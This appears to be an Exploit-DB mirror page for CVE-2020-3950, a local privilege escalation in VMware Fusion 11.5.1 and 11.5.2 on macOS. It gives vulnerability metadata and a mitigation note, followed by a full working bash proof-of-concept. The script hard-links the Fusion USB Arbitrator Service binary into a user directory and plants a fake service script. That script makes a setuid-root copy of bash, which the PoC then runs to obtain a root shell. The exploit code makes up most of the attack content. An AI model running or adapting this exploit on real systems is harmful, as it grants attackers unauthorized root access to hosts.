VMware Fusion 11.5.2 - Privilege Escalation

vendor:

Fusion

by:

Rich Mirch

7.8

CVSS

HIGH

Privilege Escalation

269

CWE

Product Name: Fusion

Affected Version From: VMware Fusion Professional 11.5.1 (15018442)

Affected Version To: VMware Fusion Professional 11.5.2 (15794494)

Patch Exists: YES

Related CWE: CVE-2020-3950

CPE: a:vmware:fusion

Metasploit: https://www.rapid7.com/db/vulnerabilities/vmsa-2020-0005-cve-2020-3950-fusion/, https://www.rapid7.com/db/vulnerabilities/vmsa-2020-0005-cve-2020-3950-horizon-client/

Other Scripts: N/A

Platforms Tested: macOS 10.14.6

2020

VMware Fusion 11.5.2 – Privilege Escalation

A privilege escalation vulnerability exists in VMware Fusion 11.5.1 and 11.5.2 that allows an attacker to gain root privileges on the host system. The vulnerability is due to the insecure handling of the Open VMware USB Arbitrator Service. An attacker can exploit this vulnerability by creating a malicious service in the ~/Contents/Library/services directory and then linking it to the ~/a/b/c directory. The malicious service will then be executed when the Open VMware USB Arbitrator Service is started. This will allow the attacker to gain root privileges on the host system.

Mitigation:

Users should upgrade to VMware Fusion 11.5.3 or later to address this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation
# Date: 2020-03-17
# Exploit Author: Rich Mirch
# Vendor Homepage: https://www.vmware.com/products/fusion.html
# Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html
# Software Link: https://download3.vmware.com/software/fusion/file/VMware-Fusion-11.5.1-15018442.dmg
# Versions:
# VMware Fusion Professional 11.5.1 (15018442)
# VMware Fusion Professional 11.5.2 (15794494)
#
# Tested on: macOS 10.14.6
# CVE : CVE-2020-3950
# Source PoC: https://raw.githubusercontent.com/mirchr/security-research/master/vulnerabilities/CVE-2020-3950.sh
#
#
#!/bin/bash
echo "CVE-2020-3950 VMware Fusion EoP PoC by @0xm1rch"

mkdir -p ~/a/b/c
mkdir -p ~/Contents/Library/services

cat > ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service <<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("cp /bin/bash $HOME/.woot;chmod 4755 $HOME/.woot");
EOF

chmod 755 ~/Contents/Library/services/VMware\ USB\ Arbitrator\ Service

cd ~/a/b/c
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service" . 2>/dev/null
"${PWD}/Open VMware USB Arbitrator Service" >/dev/null 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
kill ${p?}
wait

echo "Sleeping for 7 seconds"
sleep 7

$HOME/.woot -p